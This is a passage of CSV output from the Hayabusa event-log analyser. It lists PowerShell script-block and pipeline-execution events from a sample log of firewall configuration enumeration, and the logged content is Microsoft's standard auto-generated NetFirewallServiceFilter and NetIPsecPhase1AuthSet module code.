$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallServiceFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase1AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 